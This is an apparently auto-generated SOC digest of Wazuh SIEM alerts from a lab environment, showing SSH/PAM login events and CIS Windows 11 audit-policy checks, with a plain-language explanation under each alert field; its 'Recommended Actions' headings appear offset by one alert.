🕒 2025-04-24T22:44:24.545+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:44:24.545+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  PAM: Login session opened.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  5501
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['pam', 'syslog', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['7.8', '7.9']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AC.7']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534664.2360644
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:44:23.585709+00:00 server1 sshd[3411]: pam_unix(sshd:session): session opened for user simba(uid=1000) by simba(uid=0)
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  sshd
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:44:23.585709+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  pam
Parent decoder used – for nested parsing.

decoder.name:  pam
Name of the Wazuh decoder that parsed this raw log.

data.srcuser:  simba
User on the originating host – watch for root / SYSTEM used remotely.

data.dstuser:  simba(uid=1000)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.uid:  0
Numeric user ID – pairs with username when name missing.

location:  /var/log/auth.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Removable Storage' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Removable Storage' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:44:25.987+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:44:25.987+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  9
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Removable Storage' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19014
Numeric ID of the detection rule that fired.

rule.firedtimes:  6
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['17.6.4']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['8.5']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534665.2361103
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26160
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Audit Removable Storage' is set to 'Success and Failure'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting allows you to audit user attempts to access file system objects on a removable storage device. A security audit event is generated only for all objects for all types of access requested. If you configure this policy setting, an audit event is generated each time an account accesses a file system object on a removable storage. Success audits record successful attempts and Failure audits record unsuccessful attempts. If you do not configure this policy setting, no audit event is generated when an account accesses a file system object on a removable storage. The recommended state for this setting is: Success and Failure. Note: A Windows 8.0, Server 2012 (non-R2) or newer OS is required to access and set this value in Group Policy.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Auditing removable storage may be useful when investigating an incident. For example, if an individual is suspected of copying sensitive information onto a USB drive.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Success and Failure: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Object Access\Audit Removable Storage
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  17.6.4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  8.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.command:  ['auditpol.exe /get /subcategory:"Removable Storage"']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

data.sca.check.previous_result:  not applicable
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Audit Policy Change' is set to include 'Success'.: Status changed from 'not applicable' to passed

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Audit Policy Change' is set to include 'Success'.: Status changed from 'not applicable' to passed

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:44:32.287+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:44:32.287+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Audit Policy Change' is set to include 'Success'.: Status changed from 'not applicable' to passed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19015
Numeric ID of the detection rule that fired.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['17.7.1']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['8.5']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534672.2364815
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26161
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Audit Audit Policy Change' is set to include 'Success'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This subcategory reports changes in audit policy including SACL changes. Events for this subcategory include: - 4715: The audit policy (SACL) on an object was changed. - 4719: System audit policy was changed. - 4902: The Per-user audit policy table was created. - 4904: An attempt was made to register a security event source. - 4905: An attempt was made to unregister a security event source. - 4906: The CrashOnAuditFail value has changed. - 4907: Auditing settings on object were changed. - 4908: Special Groups Logon table modified. - 4912: Per User Audit Policy was changed. The recommended state for this setting is to include: Success.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Auditing these events may be useful when investigating a security incident.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to include Success: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Policy Change\Audit Audit Policy Change
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  17.7.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  8.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.command:  ['auditpol.exe /get /subcategory:"Audit Policy Change"']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  passed
PASS or FAIL. Red = needs fixing.

data.sca.check.previous_result:  not applicable
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authentication Policy Change' is set to include 'Success'.: Status changed from 'not applicable' to passed

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authentication Policy Change' is set to include 'Success'.: Status changed from 'not applicable' to passed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:44:32.979+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:44:32.979+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authentication Policy Change' is set to include 'Success'.: Status changed from 'not applicable' to passed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19015
Numeric ID of the detection rule that fired.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['17.7.2']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['8.5']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534672.2368099
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26162
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Audit Authentication Policy Change' is set to include 'Success'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This subcategory reports changes in authentication policy. Events for this subcategory include: - 4706: A new trust was created to a domain. - 4707: A trust to a domain was removed. - 4713: Kerberos policy was changed. - 4716: Trusted domain information was modified. - 4717: System security access was granted to an account. - 4718: System security access was removed from an account. - 4739: Domain Policy was changed. - 4864: A namespace collision was detected. - 4865: A trusted forest information entry was added. - 4866: A trusted forest information entry was removed. - 4867: A trusted forest information entry was modified. The recommended state for this setting is to include: Success.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Auditing these events may be useful when investigating a security incident.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to include Success: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Policy Change\Audit Authentication Policy Change
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  17.7.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  8.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.command:  ['auditpol.exe /get /subcategory:"Authentication Policy Change"']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  passed
PASS or FAIL. Red = needs fixing.

data.sca.check.previous_result:  not applicable
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authorization Policy Change' is set to include 'Success'.: Status changed from 'not applicable' to failed

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authorization Policy Change' is set to include 'Success'.: Status changed from 'not applicable' to failed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:44:42.406+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:44:42.406+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  9
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authorization Policy Change' is set to include 'Success'.: Status changed from 'not applicable' to failed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19014
Numeric ID of the detection rule that fired.

rule.firedtimes:  7
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['17.7.3']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['8.5']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534682.2371559
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26163
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Audit Authorization Policy Change' is set to include 'Success'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This subcategory reports changes in authorization policy. Events for this subcategory include: - 4704: A user right was assigned. - 4705: A user right was removed. - 4706: A new trust was created to a domain. - 4707: A trust to a domain was removed. - 4714: Encrypted data recovery policy was changed. The recommended state for this setting is to include: Success.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Auditing these events may be useful when investigating a security incident.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to include Success: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Policy Change\Audit Authorization Policy Change
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  17.7.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  8.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.command:  ['auditpol.exe /get /subcategory:"Authorization Policy Change"']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

data.sca.check.previous_result:  not applicable
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

PAM: Login session opened.

🧠 What happened? PAM: Login session opened.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:44:44.567+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:44:44.567+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  PAM: Login session opened.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  5501
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['pam', 'syslog', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['7.8', '7.9']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AC.7']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534684.2374351
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:44:44.558262+00:00 server1 sshd[3469]: pam_unix(sshd:session): session opened for user simba(uid=1000) by simba(uid=0)
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  sshd
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:44:44.558262+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  pam
Parent decoder used – for nested parsing.

decoder.name:  pam
Name of the Wazuh decoder that parsed this raw log.

data.srcuser:  simba
User on the originating host – watch for root / SYSTEM used remotely.

data.dstuser:  simba(uid=1000)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.uid:  0
Numeric user ID – pairs with username when name missing.

location:  /var/log/auth.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

sshd: authentication success.

🧠 What happened? sshd: authentication success.

🔍 Why it's important: Moderate‑risk ATT&CK technique

🕒 2025-04-24T22:44:44.567+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access', 'Lateral Movement'] – ['Valid Accounts', 'Remote Services'] [T1078] [T1021]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

[Medium] T1021 – Remote Services

🔍 Full Alert Details
timestamp:  2025-04-24T22:44:44.567+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  sshd: authentication success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  5715
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078', 'T1021']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access', 'Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts', 'Remote Services']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'sshd', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AC.7']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534684.2374810
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:44:44.552511+00:00 server1 sshd[3469]: Accepted password for simba from 192.168.6.135 port 57242 ssh2
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  sshd
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:44:44.552511+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  sshd
Parent decoder used – for nested parsing.

decoder.name:  sshd
Name of the Wazuh decoder that parsed this raw log.

data.srcip:  192.168.6.135
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.srcport:  57242
Source TCP/UDP port seen – can confirm outbound SMB / RDP, etc.

data.dstuser:  simba
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/auth.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Moderate‑risk ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit MPSSVC Rule-Level Policy Change' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit MPSSVC Rule-Level Policy Change' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:44:44.707+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:44:44.707+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  9
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit MPSSVC Rule-Level Policy Change' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19014
Numeric ID of the detection rule that fired.

rule.firedtimes:  8
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['17.7.4']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['8.5']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
